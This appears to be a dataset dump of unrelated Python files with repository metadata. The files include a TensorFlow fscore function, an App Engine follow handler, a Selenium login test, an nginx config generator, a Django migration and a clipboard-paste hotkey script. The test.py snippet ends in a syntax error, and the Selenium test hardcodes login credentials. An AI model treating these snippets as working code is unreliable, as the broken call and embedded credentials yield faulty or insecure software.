name: str = "fscore_evaluate") -> tf.Tensor:
"""Computes the fscore metric for the given ground truth and predicted labels.
The fscore is calculated as 2 * (precision * recall) / (precision + recall)
where the precision and recall are evaluated by the given function parameters.
The precision and recall functions default to their definition for boolean
labels (see https://en.wikipedia.org/wiki/Precision_and_recall for more
details).
Note:
In the following, A1 to An are optional batch dimensions, which must be
broadcast compatible.
Args:
ground_truth: A tensor of shape `[A1, ..., An, N]`, where the last axis
represents the ground truth values.
prediction: A tensor of shape `[A1, ..., An, N]`, where the last axis
represents the predicted values.
precision_function: The function to use for evaluating the precision.
Defaults to the precision evaluation for binary ground-truth and
predictions.
recall_function: The function to use for evaluating the recall. Defaults to
the recall evaluation for binary ground-truth and prediction.
name: A name for this op. Defaults to "fscore_evaluate".
Returns:
A tensor of shape `[A1, ..., An]` that stores the fscore metric for the
given ground truth labels and predictions.
Raises:
ValueError: if the shape of `ground_truth`, `prediction` is
not supported.
"""
with tf.name_scope(name):
ground_truth = tf.convert_to_tensor(value=ground_truth)
prediction = tf.convert_to_tensor(value=prediction)
shape.compare_batch_dimensions(
tensors=(ground_truth, prediction),
tensor_names=("ground_truth", "prediction"),
last_axes=-1,
broadcast_compatible=True)
recall = recall_function(ground_truth, prediction)
precision = precision_function(ground_truth, prediction)
return safe_ops.safe_signed_div(2 * precision * recall, precision + recall)
# API contains all public functions and classes.
__all__ = export_api.get_functions_and_classes()
| [
"copybara-worker@google.com"
] | copybara-worker@google.com |
c8e339a91dc7b41046270aadb80c7d13e20e148b | 12f511a13fe95264a16409fce37974b5ab90ca90 | /actionUser.py | f237d7538e0c9decbc0633de54be518153f39fd2 | [] | no_license | rihenvora/Instagram-Clone | 9150abf2a66b9918c4204b963b3285fe289c1826 | 26e32adc3df104e128ba5584e4b53758b2caa97b | refs/heads/master | 2022-11-04T15:29:15.583890 | 2020-06-22T12:18:17 | 2020-06-22T12:18:17 | 274,128,023 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,760 | py | import webapp2
import jinja2
from google.appengine.api import users
from google.appengine.ext import ndb
from google.appengine.ext import blobstore
from google.appengine.ext.webapp import blobstore_handlers
import os
import urlparse
from google.appengine.api import images
from instagramdb import *
JINJA_ENVIRONMENT = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),
extensions=['jinja2.ext.autoescape'],
autoescape=True
)
class actionUser(webapp2.RequestHandler):
def get(self):
self.response.headers['Content-Type'] = 'text/html'
follower=self.request.get("key1") #sarched user
action=self.request.get("key2") #action
following=self.request.get("key3") # main user
flow_users= [] #list of users follows for main user
flwing_user = [] #list of users following for follower
follower_user = ndb.Key('User',int(follower)).get()
following_user = ndb.Key('User',int(following)).get()
if action == '0':
follower_user.fllower.append(following)
following_user.folows.append(follower)
follower_user.put()
following_user.put()
elif action == '1':
for user in following_user.folows:
if follower != user:
flow_users.append(user)
for user in follower_user.fllower:
if following != user:
flwing_user.append(user)
following_user.folows = flow_users
following_user.put()
follower_user.fllower = flwing_user
follower_user.put()
#self.redirect('/details?key='+follower)
self.redirect('/')
| [
"noreply@github.com"
] | noreply@github.com |
961e76ad1d6a22225b91b5f9e9b5a45cc59f4df6 | f8095636248bac9e2b018ed3b06f36502edffb0b | /frontend_issuu_autotest_replica/tests_pro_account/TestQuickTourPRO.py | ede810b50de37975ec611870bca9add110124b14 | [] | no_license | slashsorin/auto-fe-test | deb1c696767b1c31125970679aa8ce4364fa956a | 266f3d7badb14c388edc63139bf659f60e09ac64 | refs/heads/master | 2016-08-04T10:22:18.123109 | 2013-11-22T09:16:57 | 2013-11-22T09:16:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,575 | py | import sys, time, os
#sys.path.append('/Users/Sorin/Issuu/new_eclipse_ws/frontend-issuu-autotest/autotest_framework/')
sys.path.append('../autotest_framework')
import SeleniumTestCase, make_platform_classes
import SetTestStatus as sts
import unittest, xmlrunner
class TestQuickTourPRO(SeleniumTestCase.SeleniumTestCase):
def test_quick_tour(self):
try:
sel = self.selenium
sel.set_speed("500")
sel.open("/signup/quicktour")
sel.wait_for_page_to_load("60000")
self.assertEqual("Issuu - Signup - A quick tour", sel.get_title())
self.failUnless(sel.is_element_present("xpath=//div[2]/div[4]/img"))
self.failUnless(sel.is_element_present("link=issuu"))
self.failUnless(sel.is_element_present("id=t3BodyTop"))
self.failUnless(sel.is_element_present("xpath=//div[2]/div[1]/div"))
self.failUnless(sel.is_element_present("xpath=//span[@class='system-blue-shade-fat-btn-text']/strong"))
sel.click("id=loginLink")
sel.wait_for_page_to_load("60000")
sel.type("id=username", "PROaccount")
sel.type("id=password", "autotest")
sel.click("xpath=//span[@class='system-blue-shade-fat-btn-text']//strong[.='Log in']")
sel.wait_for_page_to_load("60000")
self.assertEqual("Issuu - Signup - A quick tour", sel.get_title())
self.failUnless(sel.is_element_present("xpath=//div[2]/div[4]/img"))
self.failUnless(sel.is_element_present("link=issuu"))
self.failUnless(sel.is_element_present("id=t3BodyTop"))
self.failUnless(sel.is_element_present("xpath=//div[2]/div[1]/div"))
self.failUnless(sel.is_element_present("xpath=//span[@class='system-blue-shade-fat-btn-text']/strong"))
sel.click("link=Log out")
sel.wait_for_page_to_load("60000")
#print self.__class__.__name__ + " passed!"
#sts.set_test_status(self.selenium.get_eval("selenium.sessionId"), passed=True)
except AttributeError:
pass
#except: # catch *all* exceptions
#if sys.exc_info()[1]:
#sts.set_test_status(self.selenium.get_eval("selenium.sessionId"), passed=False)
#print self.__class__.__name__ + " failed!"
globals().update(make_platform_classes.make_platform_classes(TestQuickTourPRO))
if __name__ == '__main__':
unittest.main(testRunner=xmlrunner.XMLTestRunner(output='../test_reports')) | [
"sorin.dimo@yahoo.com"
] | sorin.dimo@yahoo.com |
a8a6e16575d5448ec39c87efc4e2a31efdc133ee | 288f9764ebf4be88fb1e4436f49953e42589a0c3 | /lesson9/test.py | be47ba579f72e3b22e8d38f495a59de90bbea29d | [] | no_license | RenardMBM/yandex.lyceum | 34657386d07786332ee950375abb3ba176044864 | 15c71a1ebe8ec73fe3b68a5fc6e23e7d49e6f8ca | refs/heads/master | 2020-03-29T11:25:41.447024 | 2018-10-22T01:38:39 | 2018-10-22T01:38:39 | 149,852,015 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 401 | py | def is_prime(n):
if type(n) != int:
# check type
raise TypeError()
elif n <= 1:
# check
raise ValueError()
# error was here: range(2, k) doesn't include k
# hence, for example, for 9 only divisor 2 will be checked
for divisor in range(2, int(n ** 0.5) + 1):
if n % divisor == 0:
return False
return True
print(is_prime(9s)) | [
"renard.mbm@yandex.ru"
] | renard.mbm@yandex.ru |
a52b455dc705da8f9fc3724685f6ef38c3740ff4 | 6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4 | /5pYkwf948KBQ3pNwz_13.py | f195abcf98ede33050c2a8f2b103f9ced9d8120e | [] | no_license | daniel-reich/ubiquitous-fiesta | 26e80f0082f8589e51d359ce7953117a3da7d38c | 9af2700dbe59284f5697e612491499841a6c126f | refs/heads/master | 2023-04-05T06:40:37.328213 | 2021-04-06T20:17:44 | 2021-04-06T20:17:44 | 355,318,759 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 480 | py |
from collections import Counter
def most_common_words(text, n):
words = ''.join([c if c.isalpha() else ' ' for c in text.lower()]).split()
seq = {}
idx = 0
for word in words:
if word not in seq:
idx += 1
seq[word] = idx
C = Counter(words)
L = [[k, v, seq[k]] for k, v in C.items()]
L.sort(key=lambda x: (-x[1], x[2]))
ans = {}
for i in range(min(n, len(L))):
ans[L[i][0]] = L[i][1]
return ans
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
0c8460f781db165f87f97883989a2feef5e75c7d | aaeaf969b31043bc3cbac2f25aef65dc8b5c8027 | /gen-nginx-conf.py | 10c20c4e8d1f0a023e2102deb7eb2625dddf3983 | [] | no_license | unknown0xff/nginx | c939f20ef76164680ee87cf2d1fe056944aec2e9 | d4f8a1b506bd0bc8f37ad57816b554703f6814b6 | refs/heads/master | 2022-11-22T17:24:58.668992 | 2020-07-28T03:02:44 | 2020-07-28T03:02:44 | 283,059,132 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,304 | py | #!/usr/bin/python3
#coding=utf-8
import sys
import os
template = '''\
user nginx;
worker_processes auto;
worker_rlimit_nofile 100000;
events {
worker_connections 2048;
}
http {
include /etc/nginx/mime.types;
default_type application/octet-stream;
keepalive_timeout 65;
include /etc/nginx/conf.d/*.conf;
server {
server_name %s;
listen 443 ssl;
ssl_certificate /etc/letsencrypt/live/%s/fullchain.pem;
ssl_certificate_key /etc/letsencrypt/live/%s/privkey.pem;
ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
ssl_prefer_server_ciphers on;
#ssl_dhparam /etc/ssl/certs/dhparam.pem;
#ssl_ciphers 'ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-AES256-GCM-SHA384:DHE-RSA-AES128-GCM-SHA256:DHE-DSS-AES128-GCM-SHA256:kEDH+AESGCM:ECDHE-RSA-AES128-SHA256:ECDHE-ECDSA-AES128-SHA256:ECDHE-RSA-AES128-SHA:ECDHE-ECDSA-AES128-SHA:ECDHE-RSA-AES256-SHA384:ECDHE-ECDSA-AES256-SHA384:ECDHE-RSA-AES256-SHA:ECDHE-ECDSA-AES256-SHA:DHE-RSA-AES128-SHA256:DHE-RSA-AES128-SHA:DHE-DSS-AES128-SHA256:DHE-RSA-AES256-SHA256:DHE-DSS-AES256-SHA:DHE-RSA-AES256-SHA:AES128-GCM-SHA256:AES256-GCM-SHA384:AES128-SHA256:AES256-SHA256:AES128-SHA:AES256-SHA:AES:CAMELLIA:DES-CBC3-SHA:!aNULL:!eNULL:!EXPORT:!DES:!RC4:!MD5:!PSK:!aECDH:!EDH-DSS-DES-CBC3-SHA:!EDH-RSA-DES-CBC3-SHA:!KRB5-DES-CBC3-SHA';
ssl_session_timeout 1d;
ssl_session_cache shared:SSL:50m;
ssl_stapling on;
ssl_stapling_verify on;
add_header Strict-Transport-Security max-age=15768000;
location / {
proxy_pass http://localhost:%s;
proxy_pass_header Server;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_pass_header Server;
proxy_connect_timeout 3s;
proxy_read_timeout 10s;
}
}
}
'''
def main():
if len(sys.argv) > 2:
domain = sys.argv[1]
forward_port = sys.argv[2]
with open('nginx.conf', 'w') as f:
f.write(template % (domain, domain, domain, forward_port))
else:
print("command error.")
if __name__ == '__main__':
main()
| [
"unknown0xff@protonmail.com"
] | unknown0xff@protonmail.com |
e13126c0e92fd4d20c09e724782792fd56bdc4d0 | 29ee2c8cfca177affdcfee96f369bdb3e8d21cda | /SDLabs/SDOM/PY/injection.py | f3506070d021dc13045da9f903c6a305b6319777 | [
"BSD-3-Clause"
] | permissive | hippiejesus/SDOM | fb9d5fb32d43b602a83bab089a54b9d735789c0c | 271328e306343dbc2f76269317950993cf5d9b4e | refs/heads/master | 2020-03-16T05:49:01.770746 | 2018-07-11T23:39:27 | 2018-07-11T23:39:27 | 132,541,179 | 0 | 0 | BSD-3-Clause | 2018-07-11T23:39:28 | 2018-05-08T02:15:32 | Python | UTF-8 | Python | false | false | 772 | py | import classes as cl
cl.load()
cl.inv.listAllCompaniesArchive = []
cl.inv.listAllEmployeesArchive = []
cl.inv.listAllRunsArchive = []
cl.inv.listAllBagsArchive = []
cl.inv.listAllTotesArchive = []
cl.inv.listFinishedBagsArchive = []
cl.inv.listFinishedTotesArchive = []
cl.inv.listAllUnfinishedProductArchive = []
cl.inv.listAllFinishedProductArchive = []
#cl.inv.listAllSourcesArchive = []
cl.inv.listAllContactsArchive = []
cl.inv.listAllDestinationsArchive = []
cl.inv.listAllLocationsArchive = []
cl.inv.listAllShipmentsArchive = []
cl.inv.listAllContainersArchive = []
cl.inv.listAllSoldProductArchive = []
cl.inv.listAllTransactionsArchive = [] #All pending transactions
cl.inv.listAllRecieptsArchive = [] #All closed transactions
cl.save()
print('save success')
| [
"noreply@github.com"
] | noreply@github.com |
7b47523319212979e6f3b6c237087b53e69b6d12 | 8b856e27bc39b3ac6cfabac0ba7b9803ab65cb74 | /users/urls.py | dc06cc234686069911998e2cee4e9d3981a2eb56 | [] | no_license | MilanSormaz/Bus-station | e65c5282bb10e8987be0318c562ee373454431d4 | e3b4f74d304f4c30b776945b8c0bc2dc935f015b | refs/heads/master | 2023-03-30T01:23:42.106925 | 2021-04-11T12:08:11 | 2021-04-11T12:08:11 | 356,855,736 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 236 | py | from django.urls import path
from . views import register
from . import views
from django.contrib.auth import views as authentication_views
app_name = 'users'
urlpatterns = [
path('register/', register, name='register'),
] | [
"msormaz@MILANSORMAZ.planetsoft.ba"
] | msormaz@MILANSORMAZ.planetsoft.ba |
94a6116c764873b6950b74de2e59c95f77bc89b1 | a8dfd770217d9aba083f1a9820914f7a3883237b | /fibb.py | 4d117302e97a60b67f6d886f7c44bd4eca4b100e | [] | no_license | Meghanaalla/sravani | 215113f095709ded30e5a47cc50398a271ffab56 | 53f4a6b78051d91f469f7399341b5f526986ad78 | refs/heads/master | 2020-03-26T05:20:07.968892 | 2018-08-30T07:20:49 | 2018-08-30T07:20:49 | 144,551,476 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 146 | py | nterms=int(raw_input())
n1=1
n2=1
count=0
if nterms==1:
print n1,
else:
while count<nterms:
print n1,
nth=n1+n2
n1=n2
n2=nth
count+=1
| [
"noreply@github.com"
] | noreply@github.com |
5f93cd10f917b5933f9628fbeb2356e722b262a9 | 726ba4ae7f0f7c6035d88a145ff1dd957317b57d | /app01/migrations/0003_auto_20171122_0859.py | 58f4e0277b2622b234359531760a07ce1cb762dc | [] | no_license | chrishug/s14day01 | 2305300291b2e6ecd558328d41cc01ac48c65274 | 2db3598d8dfc2812d26bdf1d1638d5b8d327efd8 | refs/heads/master | 2021-09-01T06:01:54.840797 | 2017-12-25T07:54:13 | 2017-12-25T07:54:13 | 115,318,671 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 528 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2017-11-22 00:59
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('app01', '0002_userinfo_group'),
]
operations = [
migrations.AlterField(
model_name='userinfo',
name='group',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='app01.Group'),
),
]
| [
"305165472@qq.com"
] | 305165472@qq.com |
e2553bf31614edf3ef91cdd52439d0a0721bc8d2 | e3fd35a8443aaf2f293ae03a5f6c819046a4dd21 | /leetcode-python/medium/_503_next_greater_element_2/test_solution.py | 68da2b92260a0e9bd3dc14ea7131a1cb31787adc | [] | no_license | hieutran106/leetcode-ht | 2223ea6bcd459c2cdbc33344c0ff69df7f8a3c7f | 8332eb20e613f82cda2e326218154c7803a32403 | refs/heads/main | 2023-08-09T02:52:41.360360 | 2023-07-27T10:12:28 | 2023-07-27T10:12:28 | 234,890,448 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 585 | py | import unittest
from .solution import Solution
class MyTestCase(unittest.TestCase):
def setUp(self) -> None:
self.s = Solution()
def test_case1(self):
actual = self.s.nextGreaterElements([1, 2, 1])
self.assertEqual(actual, [2, -1, 2])
def test_case2(self):
actual = self.s.nextGreaterElements([3, 1, 2, 4])
self.assertEqual(actual, [4, 2, 4, -1])
def test_case3(self):
actual = self.s.nextGreaterElements([3, 5, 2, 1])
self.assertEqual(actual, [5, -1, 3, 3])
if __name__ == '__main__':
unittest.main()
| [
"hieutran106@gmail.com"
] | hieutran106@gmail.com |
ce194e63f27b48f35a7a57f0c64bda97da86c689 | 17d9abd2b10267f67b40f293723414ba729b0e62 | /store/utils.py | 0ae037bd02355dc79d85f77b746d2436cb02ca33 | [] | no_license | khebizi/ecommerce | 229b7e2a261a7789f118001f35d7002bd396e2d0 | 8c02f035d522941bb2e5c76c98eac2f7e0e448bd | refs/heads/master | 2023-08-13T06:11:37.081364 | 2021-09-21T15:01:09 | 2021-09-21T15:01:09 | 403,760,377 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,305 | py | import json
from . models import *
def cookieCart(request):
#Create empty cart for now for non-logged in user
try:
cart = json.loads(request.COOKIES['cart'])
except:
cart = {}
print('CART:', cart)
items = []
order = {'get_cart_total':0, 'get_cart_items':0, 'shipping':False}
cartItems = order['get_cart_items']
for i in cart:
#We use try block to prevent items in cart that may have been removed from causing error
try:
if(cart[i]['quantity']>0): #items with negative quantity = lot of freebies
cartItems += cart[i]['quantity']
product = Product.objects.get(id=i)
total = (product.price * cart[i]['quantity'])
order['get_cart_total'] += total
order['get_cart_items'] += cart[i]['quantity']
item = {
'id':product.id,
'product':{'id':product.id,'name':product.name, 'price':product.price,
'imageURL':product.imageURL}, 'quantity':cart[i]['quantity'],
'digital':product.digital,
'getTotal':total,
}
items.append(item)
if product.digital == False:
order['shipping'] = True
except:
pass
return {'cartItems':cartItems ,'order':order, 'items':items}
def cartData(request):
if request.user.is_authenticated:
customer = request.user.customer
order, created = Order.objects.get_or_create(customer=customer, complete=False)
items = order.orderitem_set.all()
cartItems = order.get_cart_items
else:
cookieData = cookieCart(request)
cartItems = cookieData['cartItems']
order = cookieData['order']
items = cookieData['items']
return {'cartItems':cartItems ,'order':order, 'items':items}
def guestOrder(request,data):
print('COOKIES:', request.COOKIES)
name=data['form']['name']
email= data['form']['email']
cookieData= cookieCart(request)
items=cookieData['items']
customer, created = Customer.objects.get_or_create(
email=email,
)
customer.name= name
customer.save()
order = Order.objects.create(
customer=customer,
complete=False,
)
for item in items:
product = Product.objects.get(id=item['product']['id'])
orderItem = OrderItem.objects.create(
product= product,
order = order,
quantity = item['quantity']
)
return customer, order | [
"ha_khebizi@esi.dz"
] | ha_khebizi@esi.dz |
a3503117e55cbea4f116261c30a6f9f1beb731c2 | 8ec50102ba621cc048e9fa9830bf35cef441c435 | /Programming Concepts/logical_operators.py | 082ca38c0a9a539971e430a14fa3d40dcf00d5b9 | [] | no_license | TanveerAhmed98/Full-Stack-Programming | 7672b696513bd2dc624c25ce37edb30891510fff | f340b9fbc6e70c92b2ba3d5c3a0e23ebc8686503 | refs/heads/master | 2023-06-15T23:10:16.693984 | 2021-07-10T13:38:25 | 2021-07-10T13:38:25 | 380,480,957 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 467 | py | # and operator
print(True and True)
print(True and False)
print(False and True)
print(False and False)
# or operator
print(True or True)
print(True or False)
print(False or True)
print(False or False)
# not operator
print(not(True or False or False))
num = int(input("Please enter the number : "))
if (num % 2 == 0) and (num > 200):
print("The number is greater than 200 and even")
else:
print("The number is less than 200 or odd or both at a time")
| [
"tanveer.ahm98@gmail.com"
] | tanveer.ahm98@gmail.com |
50f40cf5fe4eeddfd739731d65089c3ef176b974 | 3a751dd11ad893d4222cc52148d0829de9f4029f | /django/django_extras/ajax_note/manage.py | 280f9446088e0e061158fa6cefe483cacf4818a9 | [] | no_license | higashizono33/python_stack | 76b5fc63a63913e309a545b7f586a99c684fa0d2 | 5ec93e384e911b9d05de54af232d464928b76e7e | refs/heads/master | 2023-04-18T23:18:21.569125 | 2021-04-26T02:40:55 | 2021-04-26T02:40:55 | 339,864,117 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 629 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'ajax_note.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"takashizono@gmail.com"
] | takashizono@gmail.com |
c42af3a2ce14d0a7a69408abef1650a90e836b3a | 8afb5afd38548c631f6f9536846039ef6cb297b9 | /MY_REPOS/INTERVIEW-PREP-COMPLETE/Practice/BSTFromArray/model_solution/model_solution.py | f9d67e0ad74527a0da094829f9bcf5cb690108cf | [
"MIT"
] | permissive | bgoonz/UsefulResourceRepo2.0 | d87588ffd668bb498f7787b896cc7b20d83ce0ad | 2cb4b45dd14a230aa0e800042e893f8dfb23beda | refs/heads/master | 2023-03-17T01:22:05.254751 | 2022-08-11T03:18:22 | 2022-08-11T03:18:22 | 382,628,698 | 10 | 12 | MIT | 2022-10-10T14:13:54 | 2021-07-03T13:58:52 | null | UTF-8 | Python | false | false | 2,162 | py | import math
def create_min_height_bst(sorted_array):
left = 0
right = len(sorted_array) - 1
return rec_helper(sorted_array, left, right)
def rec_helper(sorted_array, left, right):
if left > right:
return None
midpoint = ((right - left) // 2) + left
root = BinaryTreeNode(sorted_array[midpoint])
root.left = rec_helper(sorted_array, left, midpoint - 1)
root.right = rec_helper(sorted_array, midpoint + 1, right)
return root
class BinaryTreeNode:
def __init__(self, value):
self.value = value
self.left = None
self.right = None
# Helper function to validate that the created tree is a valid BST
def is_BST(root, min_bound, max_bound):
if root is None:
return True
if root.value < min_bound or root.value > max_bound:
return False
left = is_BST(root.left, min_bound, root.value - 1)
right = is_BST(root.right, root.value + 1, max_bound)
return left and right
# Helper function to check the max height of a BST
def find_bst_max_height(node):
if node is None:
return 0
return 1 + max(find_bst_max_height(node.left), find_bst_max_height(node.right))
# Helper function to validate that the given BST exhibits the min height
def is_bst_min_height(root, N):
bst_max_height = find_bst_max_height(root)
should_equal = math.floor(math.log2(N)) + 1
return bst_max_height == should_equal
# Helper function to count the number of nodes for a given BST
def count_bst_nodes(root, count):
if root is None:
return count
count_bst_nodes(root.left, count)
count += 1
count_bst_nodes(root.right, count)
# Some tests
sorted_array = [1, 2, 3, 4, 5, 6, 7]
bst = create_min_height_bst(sorted_array)
print(is_BST(bst, float("-inf"), float("inf"))) # should print true
print(is_bst_min_height(bst, len(sorted_array))) # should print true
sorted_array = [4, 10, 11, 18, 42, 43, 47, 49, 55, 67, 79, 89, 90, 95, 98, 100]
bst = create_min_height_bst(sorted_array)
print(is_BST(bst, float("-inf"), float("inf"))) # should print true
print(is_bst_min_height(bst, len(sorted_array))) # should print true
| [
"bryan.guner@gmail.com"
] | bryan.guner@gmail.com |
32900a77fe98385caef31b2d84a934479ab42690 | 0981f52175d33ce8d2d5f96161435e972b46dc04 | /binary_file/functions.py | e1125faf057eb09997dab29501721f2192771bb6 | [] | no_license | deepakmauryadev/python-file-handling | 100f6c403600fcc7660cdf86efae2cbe95431cba | 4ed13a183dcba53171b8dc82d262671b4cb4bebf | refs/heads/main | 2023-07-23T23:11:38.627586 | 2021-09-05T07:05:31 | 2021-09-05T07:05:31 | 403,120,403 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,584 | py | import pickle
def readBinaryData():
# opening with read only binary mode
f = open("bindata.dat", "rb")
# reading binary data with the help of pickle module
try:
bindata = pickle.load(f)
print(bindata)
except EOFError:
pass
# closing file
f.close()
def writeBinaryData():
# opening with write only binary mode
f = open("bindata.dat", "wb")
data = {
"id": "0",
"name": "writeBinaryData function"
}
# writing binary data with pickle.dump(data: list | dict, fileObject) function
pickle.dump(data, f)
# closing file
f.close()
def writeAndReadBinaryData():
# opening binary file with write and read mode
f = open("bindata.dat", "wb+")
data = {
"id": "1",
"name": "writeAndReadBinaryData function"
}
# write
pickle.dump(data, f)
f.seek(0)
# read
try:
bindata = pickle.load(f)
print(bindata)
except EOFError:
pass
# closing file
f.close()
def appendBinaryData():
# opening file in read and write mode
f = open("bindata.dat", "rb+")
# function to read file
def fetchBinaryData():
try:
f.seek(0)
return pickle.load(f)
except EOFError:
pass
bindata = dict(fetchBinaryData())
data = {
"nickname": "appendBinaryData"
}
bindata.update(data)
f.seek(0)
# writing file
pickle.dump(bindata, f)
print(fetchBinaryData())
# closing file
f.close() | [
"68635898+deepakmauryadev@users.noreply.github.com"
] | 68635898+deepakmauryadev@users.noreply.github.com |
dc4e85942e9578012c8c1f6f472cbf15e08c8a22 | 647f3dad23077ef7bbdb8bb79c4ad6b78d1b648c | /chap4/4-8.py | 21c21069868fc51aeb623d3f06c397787c201e1b | [
"MIT"
] | permissive | StewedChickenwithStats/Answers-to-Python-Crash-Course | df818245985b092729c92af2f0d80f3b71b8eb20 | 9ffbe02abba5d111f702d920db7932303daf59d4 | refs/heads/main | 2023-07-18T05:23:20.946093 | 2021-09-08T01:44:17 | 2021-09-08T01:44:17 | 389,494,549 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 101 | py | cubes=[]
for value in range(1,11):
cube=value**3
cubes.append(cube)
for cube in cubes:
print(cube) | [
"stella_gan@126.com"
] | stella_gan@126.com |
a0161734ebd9afefd02aedd34e2422a1934ee79a | 79fc1d1bd044d6fc361556a1e3b36e6d2af94c04 | /creditcard bisection.py | 2c99286f49cd0736e23401e0403290592512ecb2 | [] | no_license | Gmiller290488/MIT-6.01 | 51803f2e1d56f44219fd8e3b34ac2513622ba497 | c2960cc47109d5a6d6c862c5b76da71761dc873d | refs/heads/master | 2021-01-11T23:56:51.349529 | 2017-01-11T14:38:47 | 2017-01-11T14:38:47 | 78,647,928 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 734 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Sep 12 18:58:24 2016
minimum credit card repayments to the pence
using bisection search
@author: Gmiller
"""
monthlyInterestRate = annualInterestRate/12.0
lowerPayment = balance/12.0
upperPayment = ((balance*(1 + monthlyInterestRate)**12)/12.00)
newBalance = balance
while newBalance != 0:
guess = (upperPayment + lowerPayment) / 2
newBalance = balance
for month in range(12):
newBalance -= guess
newBalance = newBalance + (newBalance*monthlyInterestRate)
if round(newBalance, 0) == 0:
break
elif newBalance > 0:
lowerPayment = guess
elif newBalance < 0:
upperPayment = guess
print("Lowest Payment: ", round(guess, 2)) | [
"gmiller290488@gmail.com"
] | gmiller290488@gmail.com |
4ed97237e85cb0a7d11bd881738cfdaef5c42744 | 117d254212e6f888e28abc3cf8c1993a78736ebf | /nsaid/wsgi.py | 47b0a92e97655fc8a6edd01c86761722211495d5 | [] | no_license | nsaid-team/gotopaws | db56af85e3e83e2117941c26e1f211f3f440ba26 | fe5240af2667d79f6451462ab4dc56e86fa3dece | refs/heads/master | 2020-12-24T14:27:27.687640 | 2015-09-01T17:36:36 | 2015-09-01T17:36:36 | 38,507,747 | 4 | 3 | null | 2015-07-22T03:00:41 | 2015-07-03T19:31:13 | HTML | UTF-8 | Python | false | false | 377 | py | """
WSGI config for nsaid project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ['DJANGO_SETTINGS_MODULE'] = 'nsaid.settings'
application = get_wsgi_application()
| [
"npererar@utexas.edu"
] | npererar@utexas.edu |
c51e82ef5ab82087c69682991cef51b0315cbd94 | e03934835d0b3c60609edffbdd8e78f7c885f3ec | /Autopaste.pyw | b1701c50989a68cd4dffe2a85cac6fe741c79643 | [
"MIT"
] | permissive | ejaytc/Auto-Paste-Text | d24b1f6e764f513137977af1046e51c19f72af3b | 70dbce496330b31e9bad39669345525dbbe253f0 | refs/heads/master | 2020-07-13T11:35:33.367312 | 2019-08-29T05:05:26 | 2019-08-29T05:05:26 | 205,004,427 | 0 | 0 | MIT | 2019-08-29T03:38:41 | 2019-08-28T19:08:11 | Python | UTF-8 | Python | false | false | 1,805 | pyw | #!/usr/bin/env python3
from pynput.keyboard import Key, Listener, KeyCode
from docx import Document
import os, pyperclip, shelve, subprocess, re
def autopaste():
data = shelve.open("AutopasteData")
Path = data["path_"]
File = data["file_"]
data.close()
check_(Path)
new_document = os.path.join(Path, File)
if not os.path.exists(new_document):
document = Document()
else:
document = Document(new_document)
text = pyperclip.paste()
document.add_paragraph(text)
document.save(new_document)
def open_ui():
check_(file_path)
subprocess.call("python3 ApMainUi.pyw", shell=True)
def check_(file_path):
if not os.path.exists(file_path):
os.mkdir(file_path)
COMBINATION = {
frozenset([Key.shift, KeyCode(char = 'S')]): autopaste,
frozenset([Key.shift, KeyCode(char = 's')]): autopaste,
frozenset([Key.ctrl, Key.alt, KeyCode(char='U')]): open_ui,
frozenset([Key.ctrl, Key.alt, KeyCode(char='u')]): open_ui
}
current = set()
def on_press(key):
current.add(key)
if frozenset(current) in COMBINATION:
COMBINATION[frozenset(current)]()
def on_released(key):
if key in current:
current.remove(key)
elif not current == None:
rm = list(current)
for r in rm:
current.remove(r)
if __name__ == "__main__":
fformat = re.compile(r'\D*.docx')
data = shelve.open("AutopasteData")
if not 'True' in dict(data):
data["path_"] = "/home/jay/Documents/AutoPasteDocuments"
data["file_"] = "pastedDoc-file.docx"
data["Check"] = True
file_path = data["path_"]
data.close()
check_(file_path)
with Listener(on_press=on_press, on_release=on_released) as listener:
listener.join() | [
"ejaytc@gmail.com"
] | ejaytc@gmail.com |
